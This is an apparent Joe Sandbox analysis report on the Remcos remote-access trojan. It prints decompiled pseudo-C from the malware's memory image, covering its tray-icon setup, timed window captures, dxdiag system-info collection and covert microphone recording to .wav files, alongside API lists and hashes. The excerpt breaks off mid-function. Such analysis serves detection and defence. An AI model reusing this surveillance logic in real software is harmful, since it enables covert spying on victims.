                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: a77394449d3610cf2611ec2a31762a356df4dfaed9a22a67b89f0f03ee6ab5ce
                • Instruction ID: 446d01ee53aad5418ccd4e85611433309046038f6e50f54d807d40262714f670
                • Opcode Fuzzy Hash: a77394449d3610cf2611ec2a31762a356df4dfaed9a22a67b89f0f03ee6ab5ce
                • Instruction Fuzzy Hash: F511B9B9100509BFEF01EF56D842CDD3B69FF04758B1140AAF9488F222D676DE509B85
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00418B0F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 176sleeptimeCOMMON
                Download Yara Rule
                C-Code - Quality: 85%
                			E00418B0F() {
				intOrPtr* _t42;
				void* _t45;
				char* _t54;
				void* _t72;
				long _t78;
				void* _t83;
				struct _SECURITY_ATTRIBUTES* _t85;
				struct _SECURITY_ATTRIBUTES* _t92;
				void* _t131;
				void* _t132;
				void* _t140;
				void* _t141;
				void* _t146;
				intOrPtr _t147;
				void* _t148;
				void* _t149;

				E00456328(E00456753, _t146);
				_push(_t141);
				 *((intOrPtr*)(_t146 - 0x10)) = _t147;
				_t92 = 0;
				 *((intOrPtr*)(_t146 - 4)) = 0;
				_t149 =  *0x470da4 - _t92; // 0x0
				if(_t149 == 0) {
					_t147 = _t147 - 0xc;
					_t131 = _t146 - 0x68;
					E004174ED(_t131);
					__imp__GdiplusStartup(0x470da4, _t131, 0);
				}
				_t150 =  *0x4726a8 - _t92;
				if( *0x4726a8 == _t92) {
					E00401EF3(0x473600, _t132, _t141, E00418023(_t146 - 0x40, _t132));
					E00401EE9();
				}
				_t42 = E00401F8B(E00401E45(0x473298, _t132, _t146, _t150, 0x19));
				_t45 = E00401EE4(E0041A7B9(_t146 - 0x58, E00401E45(0x473298, _t132, _t146, _t150, 0x1a)));
				_t134 =  *_t42;
				E00401EF3(0x473618,  *_t42, 0x473618, E0040CF38(_t146 - 0x40,  *_t42, _t45));
				E00401EE9();
				E00401EE9();
				CreateDirectoryW(E00401EE4(0x473618), _t92);
				E00401F66(_t92, _t146 - 0xb0);
				E00401F66(_t92, _t146 - 0x80);
				 *(_t146 - 0x11) = _t92;
				 *0x470d63 = 1;
				_t54 =  *((intOrPtr*)(_t146 + 8));
				_t145 =  !=  ? L"time_%04i%02i%02i_%02i%02i%02i" : L"wnd_%04i%02i%02i_%02i%02i%02i";
				 *(_t146 - 0x18) =  !=  ? L"time_%04i%02i%02i_%02i%02i%02i" : L"wnd_%04i%02i%02i_%02i%02i%02i";
				_t140 = Sleep;
				L6:
				while(1) {
					if( *_t54 != 1) {
						L11:
						GetLocalTime(_t146 - 0x28);
						_push( *(_t146 - 0x1c) & 0x0000ffff);
						_push( *(_t146 - 0x1e) & 0x0000ffff);
						_push( *(_t146 - 0x20) & 0x0000ffff);
						_push( *(_t146 - 0x22) & 0x0000ffff);
						_push( *(_t146 - 0x26) & 0x0000ffff);
						E004174C7(_t146 - 0x2b8, _t145,  *(_t146 - 0x28) & 0x0000ffff);
						_t147 = _t147 + 0x20;
						E00401EF3(_t146 - 0x80, _t66, _t145, E00402FF4(_t92, _t146 - 0x58, E00402FF4(_t92, _t146 - 0x40, E004087F0(_t146 - 0x98, 0x473618, _t146, "\\"), _t140, _t146, __eflags, _t146 - 0x2b8), _t140, _t146, __eflags, 0x4644f0));
						E00401EE9();
						E00401EE9();
						E00401EE9();
						_t72 = E00401EE4(_t146 - 0x80);
						_t134 =  *((intOrPtr*)( *((intOrPtr*)(_t146 + 8)) + 1));
						E004189C9(_t72,  *((intOrPtr*)( *((intOrPtr*)(_t146 + 8)) + 1)), __eflags);
						__eflags =  *((char*)( *((intOrPtr*)(_t146 + 8))));
						if(__eflags != 0) {
							_t92 = 0;
							 *(_t146 - 0x11) = 0;
							_t78 = E0043A3AC(_t75, E00401F8B(E00401E45(0x473298, _t134, _t146, __eflags, 0x18))) * 0x3e8;
							__eflags = _t78;
						} else {
							_t78 = E0043A3AC(_t79, E00401F8B(E00401E45(0x473298, _t134, _t146, __eflags, 0x15))) * 0xea60;
						}
						Sleep(_t78);
						_t54 =  *((intOrPtr*)(_t146 + 8));
						continue;
					}
					_t145 = L"wnd_%04i%02i%02i_%02i%02i%02i";
					 *(_t146 - 0x18) = L"wnd_%04i%02i%02i_%02i%02i%02i";
					while(1) {
						_t153 = _t92;
						if(_t92 != 0) {
							goto L11;
						}
						_t83 = E00401F8B(E00401E45(0x473298, _t134, _t146, _t153, 0x17));
						_t148 = _t147 - 0x18;
						E0040415E(_t92, _t148, _t134, _t146, _t83);
						_t85 = E0041AECA(0, _t134);
						_t147 = _t148 + 0x18;
						_t92 = _t85;
						 *(_t146 - 0x11) = _t92;
						if(_t92 != 0) {
							goto L11;
						}
						Sleep(0x3e8);
					}
					goto L11;
				}
			}



















                0x00418b14
                0x00418b20
                0x00418b22
                0x00418b25
                0x00418b27
                0x00418b2a
                0x00418b30
                0x00418b32
                0x00418b35
                0x00418b38
                0x00418b46
                0x00418b46
                0x00418b4c
                0x00418b52
                0x00418b62
                0x00418b6a
                0x00418b6a
                0x00418b7f
                0x00418b9b
                0x00418ba1
                0x00418bb4
                0x00418bbc
                0x00418bc4
                0x00418bd2
                0x00418bde
                0x00418be6
                0x00418beb
                0x00418bee
                0x00418bff
                0x00418c05
                0x00418c08
                0x00418c0b
                0x00000000
                0x00418c11
                0x00418c14
                0x00418c5c
                0x00418c60
                0x00418c6a
                0x00418c6f
                0x00418c74
                0x00418c79
                0x00418c7e
                0x00418c8c
                0x00418c91
                0x00418cd0
                0x00418cd8
                0x00418ce0
                0x00418ceb
                0x00418cf3
                0x00418cfb
                0x00418d00
                0x00418d0d
                0x00418d10
                0x00418d2e
                0x00418d30
                0x00418d47
                0x00418d47
                0x00418d12
                0x00418d26
                0x00418d26
                0x00418d4f
                0x00418d51
                0x00000000
                0x00418d51
                0x00418c16
                0x00418c1b
                0x00418c1e
                0x00418c1e
                0x00418c20
                0x00000000
                0x00000000
                0x00418c30
                0x00418c35
                0x00418c3b
                0x00418c42
                0x00418c47
                0x00418c4a
                0x00418c4c
                0x00418c51
                0x00000000
                0x00000000
                0x00418c58
                0x00418c58
                0x00000000
                0x00418c1e

                APIs
                • __EH_prolog.LIBCMT ref: 00418B14
                • GdiplusStartup.GDIPLUS(00470DA4,?,00000000), ref: 00418B46
                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 00418BD2
                • Sleep.KERNEL32(000003E8), ref: 00418C58
                • GetLocalTime.KERNEL32(?), ref: 00418C60
                • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00418D4F
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                • API String ID: 489098229-3790400642
                • Opcode ID: 83ab5a1f807aee275f6c9b7f2735ccbbfe226c5f98278b5de8977729f6c5689f
                • Instruction ID: 3ed6f2237b04738f373db28fc4f4b477a217fcc6b97d40d34bd9c141d7353832
                • Opcode Fuzzy Hash: 83ab5a1f807aee275f6c9b7f2735ccbbfe226c5f98278b5de8977729f6c5689f
                • Instruction Fuzzy Hash: 62515E70A002149BCB14BBA5D8969FE7BA9AF54308F00007FF905A72D2EE3C5E859799
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00454805 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,004558FF), ref: 00454828
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: DecodePointer
                • String ID: acos$asin$exp$log$log10$pow$sqrt
                • API String ID: 3527080286-3064271455
                • Opcode ID: 0e018571e0e3bee39f27182ae3374471161ca0f080fa7e6920fbb972b2695178
                • Instruction ID: 1e4b404f929ba93ddebd2aa3e63fb042eaa484edc2c2b789af0694e21190d044
                • Opcode Fuzzy Hash: 0e018571e0e3bee39f27182ae3374471161ca0f080fa7e6920fbb972b2695178
                • Instruction Fuzzy Hash: F2519474900509DBCB04DF69E5481AEBBB4FB8930AF504197DC44AF256C7398EADCB1D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00416495 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                Download Yara Rule
                C-Code - Quality: 92%
                			E00416495(void* __ecx, void* __edx, void* __edi, void* __eflags, char _a4) {
				char _v28;
				char _v52;
				char _v76;
				char _v204;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t46;
				void* _t54;
				void* _t55;
				void* _t90;
				void* _t92;
				void* _t93;

				_t95 = __eflags;
				_t90 = __edi;
				E00402FF4(_t54,  &_v76, E0040415E(_t54,  &_v52, __edx, _t92, E0043A99F(_t54, __ecx, __eflags, L"temp")), _t90, _t92, _t95, L"\\sysinfo.txt");
				E00401EE9();
				_t55 = 0;
				ShellExecuteW(0, L"open", L"dxdiag", E00401EE4(E0040AEF6( &_v52, L"/t ", _t92,  &_v76)), 0, 0);
				E00401EE9();
				E004020BF(0,  &_v28);
				_t91 = 0;
				do {
					E00401EE4( &_v76);
					_t88 =  &_v28;
					E0041ADFE( &_v28);
					Sleep(0x64);
					_t91 = _t91 + 1;
				} while (E0040619C() != 0 && _t91 < 0x4b0);
				if(E0040619C() == 0) {
					DeleteFileW(E00401EE4( &_v76));
					_t75 =  &_v204;
					E004046D7( &_v204, _t92, 1);
					_t46 = E004048A8( &_v204, _t91, _t75);
					_t100 = _t46;
					if(_t46 != 0) {
						_t91 = _t93 - 0x18;
						_t88 = E00402F11( &_v52,  &_a4, _t92, 0x472ec8);
						E00402EF0(_t55, _t93 - 0x18, _t49, _t92, _t100,  &_v28);
						_push(0x97);
						E00404A81( &_v204, _t49, _t100);
						E00401FB8();
						E00404E06(_t88);
						_t55 = 1;
					}
					E00404EC2(_t55,  &_v204, _t88, _t91);
				}
				E00401FB8();
				E00401EE9();
				E00401FB8();
				return _t55;
			}
















                0x00416495
                0x00416495
                0x004164be
                0x004164c7
                0x004164cc
                0x004164f5
                0x004164fe
                0x00416506
                0x0041650b
                0x0041650d
                0x00416510
                0x00416515
                0x0041651a
                0x00416521
                0x0041652a
                0x00416530
                0x00416546
                0x00416555
                0x0041655d
                0x00416563
                0x0041656f
                0x00416574
                0x00416576
                0x0041657e
                0x00416592
                0x00416596
                0x0041659c
                0x004165a7
                0x004165af
                0x004165ba
                0x004165bf
                0x004165bf
                0x004165c7
                0x004165c7
                0x004165cf
                0x004165d7
                0x004165df
                0x004165eb

                APIs
                • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004164F5
                  • Part of subcall function 0041ADFE: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409DB6), ref: 0041AE17
                • Sleep.KERNEL32(00000064), ref: 00416521
                • DeleteFileW.KERNEL32(00000000), ref: 00416555
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: File$CreateDeleteExecuteShellSleep
                • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                • API String ID: 1462127192-2001430897
                • Opcode ID: d88a2a61b45edcd269812ed728d67c50ffe2f582f56f68ab25c7f127d7968374
                • Instruction ID: c83c678f58a6655289b5cf6a6ce0edad258ffa977a2a4ba52374f317f639f8dc
                • Opcode Fuzzy Hash: d88a2a61b45edcd269812ed728d67c50ffe2f582f56f68ab25c7f127d7968374
                • Instruction Fuzzy Hash: F23150719401095ACB04FBA1DC96EEE7779AF50309F40017FF506731D2EE78598ACA9D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401CEB Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                Download Yara Rule
                C-Code - Quality: 91%
                			E00401CEB(void* __ebx, void* __edx, void* __edi, intOrPtr _a8) {
				char _v84;
				char _v112;
				void* _v116;
				char _v136;
				void* _v140;
				char _v160;
				void* _v164;
				char _v184;
				void* _v188;
				char _v204;
				char _v208;
				void* _v212;
				char _v228;
				char _v232;
				char _v236;
				void* __esi;
				void* __ebp;
				void* _t29;
				intOrPtr _t43;
				void* _t76;
				void* _t79;

				_t47 = __ebx;
				_push(_t76);
				E00401F66(__ebx,  &_v228);
				_t84 = _a8 - 0x3c0;
				if(_a8 == 0x3c0) {
					E004016E7();
					E00439269( &_v84, 0x50, "%Y-%m-%d %H.%M", E004016DF());
					E00402073(__ebx,  &_v204, __edx, _t79,  &_v84);
					_push(L".wav");
					_t29 = E0041A7B9( &_v112,  &_v208);
					E00401EF3( &_v232, _t31, _t76, E00402FF4(_t47,  &_v184, E00402F85( &_v160, E00402F52(__ebx,  &_v136, 0x472d40, _t79), 0x5c), __edi, _t79, _t84, _t29));
					E00401EE9();
					E00401EE9();
					E00401EE9();
					E00401EE9();
					E00401FB8();
					E00401A4D(E00401EE4( &_v236), 0x470a88);
					waveInUnprepareHeader( *0x470ac0, 0x470a88, 0x20);
					0x470a88->lpData = E00401F8B(0x472d58);
					_t43 =  *0x470ac4; // 0x0
					 *0x470a8c = _t43;
					 *0x470a90 = 0;
					 *0x470a94 = 0;
					 *0x470a98 = 0;
					 *0x470a9c = 0;
					waveInPrepareHeader( *0x470ac0, 0x470a88, 0x20);
					waveInAddBuffer( *0x470ac0, 0x470a88, 0x20);
				}
				return E00401EE9();
			}
























                0x00401ceb
                0x00401cfb
                0x00401cfc
                0x00401d01
                0x00401d08
                0x00401d12
                0x00401d30
                0x00401d44
                0x00401d49
                0x00401d59
                0x00401d8d
                0x00401d96
                0x00401d9f
                0x00401da8
                0x00401db4
                0x00401dbd
                0x00401dd4
                0x00401de2
                0x00401df4
                0x00401df9
                0x00401e05
                0x00401e0c
                0x00401e11
                0x00401e16
                0x00401e1b
                0x00401e20
                0x00401e2f
                0x00401e2f
                0x00401e42

                APIs
                • _strftime.LIBCMT ref: 00401D30
                  • Part of subcall function 00401A4D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
                • waveInUnprepareHeader.WINMM(00470A88,00000020,00000000,?), ref: 00401DE2
                • waveInPrepareHeader.WINMM(00470A88,00000020), ref: 00401E20
                • waveInAddBuffer.WINMM(00470A88,00000020), ref: 00401E2F
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                • String ID: %Y-%m-%d %H.%M$.wav$@-G$X-G
                • API String ID: 3809562944-1740755071
                • Opcode ID: e0b355b770bc1730a0a616840a9c6e7c4d5febeab328e315ee3cdfcdd267426b
                • Instruction ID: 6e40445bcf9654caa432548e7993fb83a4077dca951e3b59059cc53d3c4022e6
                • Opcode Fuzzy Hash: e0b355b770bc1730a0a616840a9c6e7c4d5febeab328e315ee3cdfcdd267426b
                • Instruction Fuzzy Hash: 13317E315053019BC314FB66DC46A9E77E8EB94304F00893EF549A21F2EF789A49CB9E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004103A4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75COMMON
                Download Yara Rule
                C-Code - Quality: 92%
                			E004103A4(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				void* _v8;
				char _v12;
				char _v24;
				void* __esi;
				intOrPtr _t40;
				void* _t48;
				intOrPtr* _t51;

				E00433BCB( &_v12, 0);
				_t48 =  *0x474a74;
				_v8 = _t48;
				_t51 = E0040D696(_a4, E0040D5C5(0x470140));
				if(_t51 != 0) {
					L5:
					E00433C23( &_v12);
					return _t51;
				} else {
					if(_t48 == 0) {
						__eflags = E0040D7AD(__ebx, __edx,  &_v8, _a4) - 0xffffffff;
						if(__eflags == 0) {
							E0040D491( &_v24);
							E004379F6( &_v24, 0x46cd4c);
							asm("int3");
							_t40 =  *((intOrPtr*)( *[fs:0x2c]));
							__eflags =  *0x474a68 -  *((intOrPtr*)(_t40 + 4));
							if( *0x474a68 >  *((intOrPtr*)(_t40 + 4))) {
								_push(_t51);
								E00432CF1(0x474a68);
								__eflags =  *0x474a68 - 0xffffffff;
								if( *0x474a68 == 0xffffffff) {
									E0041074B();
									E0043307B(__eflags, 0x456962);
									E00432CB2(0x474a68, 0x474a68);
								}
							}
							return 0x474a6c;
						} else {
							_t51 = _v8;
							 *0x474a74 = _t51;
							 *((intOrPtr*)( *_t51 + 4))();
							E00433DDC(__eflags, _t51);
							goto L5;
						}
					} else {
						_t51 = _t48;
						goto L5;
					}
				}
			}










                0x004103b1
                0x004103b6
                0x004103c1
                0x004103d2
                0x004103d6
                0x0041040a
                0x0041040d
                0x00410419
                0x004103d8
                0x004103da
                0x004103ee
                0x004103f1
                0x0041041d
                0x0041042b
                0x00410430
                0x00410437
                0x0041043e
                0x00410444
                0x00410446
                0x0041044d
                0x00410452
                0x0041045a
                0x0041045c
                0x00410466
                0x0041046c
                0x00410472
                0x00410473
                0x00410479
                0x004103f3
                0x004103f3
                0x004103f8
                0x00410400
                0x00410404
                0x00000000
                0x00410409
                0x004103dc
                0x004103dc
                0x00000000
                0x004103dc
                0x004103da

                APIs
                • std::_Lockit::_Lockit.LIBCPMT ref: 004103B1
                • int.LIBCPMT ref: 004103C4
                  • Part of subcall function 0040D5C5: std::_Lockit::_Lockit.LIBCPMT ref: 0040D5D6
                  • Part of subcall function 0040D5C5: std::_Lockit::~_Lockit.LIBCPMT ref: 0040D5F0
                • std::_Facet_Register.LIBCPMT ref: 00410404
                • std::_Lockit::~_Lockit.LIBCPMT ref: 0041040D
                • __CxxThrowException@8.LIBVCRUNTIME ref: 0041042B
                • __Init_thread_footer.LIBCMT ref: 0041046C
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                • String ID: hJG$lJG
                • API String ID: 3815856325-3986032958
                • Opcode ID: d4a0570ecbcf5ece8d5908e1c3d22f52c6d87fbfb43144eaa5cda1b4a7bc5fbd
                • Instruction ID: 6c6f380f6bf393aa298e891036efe52b613f3523a9b97c737d9d060c2d8c6b16
                • Opcode Fuzzy Hash: d4a0570ecbcf5ece8d5908e1c3d22f52c6d87fbfb43144eaa5cda1b4a7bc5fbd
                • Instruction Fuzzy Hash: 232108329402149BC710EBA9C9819EE73A89F84324F20466FF915A72D1DF7CAEC1C79D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0041BD68 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E0041BD68(void* __eflags) {
				struct tagMSG _v32;
				char _v300;
				int _t14;

				GetModuleFileNameA(0,  &_v300, 0x104);
				 *0x472b24 = E0041BE1A();
				0x472b20->cbSize = 0x1fc;
				 *0x472b28 = 1;
				 *0x472b30 = 0x401;
				 *0x472b34 = ExtractIconA(0,  &_v300, 0);
				lstrcpynA(0x472b38, "Remcos", 0x80);
				 *0x472b2c = 7;
				Shell_NotifyIconA(0, 0x472b20);
				while(1) {
					_t14 = GetMessageA( &_v32, 0, 0, 0);
					if(_t14 == 0) {
						break;
					}
					TranslateMessage( &_v32);
					DispatchMessageA( &_v32);
				}
				return _t14;
			}






                0x0041bd81
                0x0041bd8c
                0x0041bd9a
                0x0041bda4
                0x0041bdae
                0x0041bdcd
                0x0041bdd2
                0x0041bdde
                0x0041bde8
                0x0041be04
                0x0041be0b
                0x0041be13
                0x00000000
                0x00000000
                0x0041bdf4
                0x0041bdfe
                0x0041bdfe
                0x0041be19

                APIs
                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041BD81
                  • Part of subcall function 0041BE1A: RegisterClassExA.USER32(00000030), ref: 0041BE66
                  • Part of subcall function 0041BE1A: CreateWindowExA.USER32 ref: 0041BE81
                  • Part of subcall function 0041BE1A: GetLastError.KERNEL32 ref: 0041BE8B
                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041BDB8
                • lstrcpynA.KERNEL32(00472B38,Remcos,00000080), ref: 0041BDD2
                • Shell_NotifyIconA.SHELL32(00000000,00472B20), ref: 0041BDE8
                • TranslateMessage.USER32(?), ref: 0041BDF4
                • DispatchMessageA.USER32 ref: 0041BDFE
                • GetMessageA.USER32 ref: 0041BE0B
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                • String ID: Remcos
                • API String ID: 1970332568-165870891
                • Opcode ID: 2d143759cf1fb37759ec7f404772a1ad4e1485a2e1ecf97a8841056aeb74ba0a
                • Instruction ID: 82a48a2e9b81ede311839844b2886800dd1b811866fb10484f52e0710d5afa0d
                • Opcode Fuzzy Hash: 2d143759cf1fb37759ec7f404772a1ad4e1485a2e1ecf97a8841056aeb74ba0a
                • Instruction Fuzzy Hash: BB013C71404304ABD7109FA1EE08EDB7BBCEB45715F00407AFA0492161D7B8A085CB6C
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0044B600 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 77%
                			E0044B600(signed int _a4, void* _a8, unsigned int _a12) {
				signed int _v5;
				char _v6;
				void* _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				long _v36;
				void* _v40;
				long _v44;
				signed int* _t143;
				signed int _t145;
				intOrPtr _t149;
				signed int _t153;
				signed int _t155;
				signed char _t157;
				unsigned int _t158;
				intOrPtr _t162;
				void* _t163;
				signed int _t164;
				signed int _t167;
				long _t168;
				intOrPtr _t175;
				signed int _t176;
				intOrPtr _t178;
				signed int _t180;
				signed int _t184;
				char _t191;
				char* _t192;
				char _t199;
				char* _t200;
				signed char _t211;
				signed int _t213;
				long _t215;
				signed int _t216;
				char _t218;
				signed char _t222;
				signed int _t223;
				unsigned int _t224;
				intOrPtr _t225;
				unsigned int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed char _t236;
				signed int _t237;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t246;
				void* _t248;
				void* _t249;

				_t213 = _a4;
				if(_t213 != 0xfffffffe) {
					__eflags = _t213;
					if(_t213 < 0) {
						L58:
						_t143 = E0043EE9A();
						 *_t143 =  *_t143 & 0x00000000;
						__eflags =  *_t143;
						 *((intOrPtr*)(E0043EEAD())) = 9;
						L59:
						_t145 = E0043A5BB();
						goto L60;
					}
					__eflags = _t213 -  *0x470a10; // 0x40
					if(__eflags >= 0) {
						goto L58;
					}
					_v24 = 1;
					_t239 = _t213 >> 6;
					_t235 = (_t213 & 0x0000003f) * 0x30;
					_v20 = _t239;
					_t149 =  *((intOrPtr*)(0x470810 + _t239 * 4));
					_v28 = _t235;
					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
					_v5 = _t222;
					__eflags = _t222 & 0x00000001;
					if((_t222 & 0x00000001) == 0) {
						goto L58;
					}
					_t223 = _a12;
					__eflags = _t223 - 0x7fffffff;
					if(_t223 <= 0x7fffffff) {
						__eflags = _t223;
						if(_t223 == 0) {
							L57:
							return 0;
						}
						__eflags = _v5 & 0x00000002;
						if((_v5 & 0x00000002) != 0) {
							goto L57;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							goto L6;
						}
						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
						_v5 = _t153;
						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
						_t246 = 0;
						_t155 = _t153 - 1;
						__eflags = _t155;
						if(_t155 == 0) {
							_t236 = _v24;
							_t157 =  !_t223;
							__eflags = _t236 & _t157;
							if((_t236 & _t157) != 0) {
								_t158 = 4;
								_t224 = _t223 >> 1;
								_v16 = _t158;
								__eflags = _t224 - _t158;
								if(_t224 >= _t158) {
									_t158 = _t224;
									_v16 = _t224;
								}
								_t246 = E00444A38(_t224, _t158);
								E00445002(0);
								E00445002(0);
								_t249 = _t248 + 0xc;
								_v12 = _t246;
								__eflags = _t246;
								if(_t246 != 0) {
									_t162 = E0044AB6C(_t213, 0, 0, _v24);
									_t225 =  *((intOrPtr*)(0x470810 + _t239 * 4));
									_t248 = _t249 + 0x10;
									_t240 = _v28;
									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
									_t163 = _t246;
									 *(_t240 + _t225 + 0x24) = _t236;
									_t235 = _t240;
									_t223 = _v16;
									L21:
									_t241 = 0;
									_v40 = _t163;
									_t215 =  *((intOrPtr*)(0x470810 + _v20 * 4));
									_v36 = _t215;
									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
									_t216 = _a4;
									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
										_v6 = _t218;
										__eflags = _t218 - 0xa;
										_t216 = _a4;
										if(_t218 != 0xa) {
											__eflags = _t223;
											if(_t223 != 0) {
												_t241 = _v24;
												 *_t163 = _v6;
												_t216 = _a4;
												_t232 = _t223 - 1;
												__eflags = _v5;
												_v12 = _t163 + 1;
												_v16 = _t232;
												 *((char*)(_t235 +  *((intOrPtr*)(0x470810 + _v20 * 4)) + 0x2a)) = 0xa;
												if(_v5 != 0) {
													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x470810 + _v20 * 4)) + 0x2b));
													_v6 = _t191;
													__eflags = _t191 - 0xa;
													if(_t191 != 0xa) {
														__eflags = _t232;
														if(_t232 != 0) {
															_t192 = _v12;
															_t241 = 2;
															 *_t192 = _v6;
															_t216 = _a4;
															_t233 = _t232 - 1;
															_v12 = _t192 + 1;
															_v16 = _t233;
															 *((char*)(_t235 +  *((intOrPtr*)(0x470810 + _v20 * 4)) + 0x2b)) = 0xa;
															__eflags = _v5 - _v24;
															if(_v5 == _v24) {
																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x470810 + _v20 * 4)) + 0x2c));
																_v6 = _t199;
																__eflags = _t199 - 0xa;
																if(_t199 != 0xa) {
																	__eflags = _t233;
																	if(_t233 != 0) {
																		_t200 = _v12;
																		_t241 = 3;
																		 *_t200 = _v6;
																		_t216 = _a4;
																		_t234 = _t233 - 1;
																		__eflags = _t234;
																		_v12 = _t200 + 1;
																		_v16 = _t234;
																		 *((char*)(_t235 +  *((intOrPtr*)(0x470810 + _v20 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t164 = E00453DF6(_t216);
									__eflags = _t164;
									if(_t164 == 0) {
										L41:
										_v24 = 0;
										L42:
										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0);
										__eflags = _t167;
										if(_t167 == 0) {
											L53:
											_t168 = GetLastError();
											_t241 = 5;
											__eflags = _t168 - _t241;
											if(_t168 != _t241) {
												__eflags = _t168 - 0x6d;
												if(_t168 != 0x6d) {
													L37:
													E0043EE77(_t168);
													goto L38;
												}
												_t242 = 0;
												goto L39;
											}
											 *((intOrPtr*)(E0043EEAD())) = 9;
											 *(E0043EE9A()) = _t241;
											goto L38;
										}
										_t229 = _a12;
										__eflags = _v36 - _t229;
										if(_v36 > _t229) {
											goto L53;
										}
										_t242 = _t241 + _v36;
										__eflags = _t242;
										L45:
										_t237 = _v28;
										_t175 =  *((intOrPtr*)(0x470810 + _v20 * 4));
										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v24;
												_push(_t242 >> 1);
												_push(_v40);
												_push(_t216);
												if(_v24 == 0) {
													_t176 = E0044B15C();
												} else {
													_t176 = E0044B46C();
												}
											} else {
												_t230 = _t229 >> 1;
												__eflags = _t229 >> 1;
												_t176 = E0044B31C(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
											}
											_t242 = _t176;
										}
										goto L39;
									}
									_t231 = _v28;
									_t178 =  *((intOrPtr*)(0x470810 + _v20 * 4));
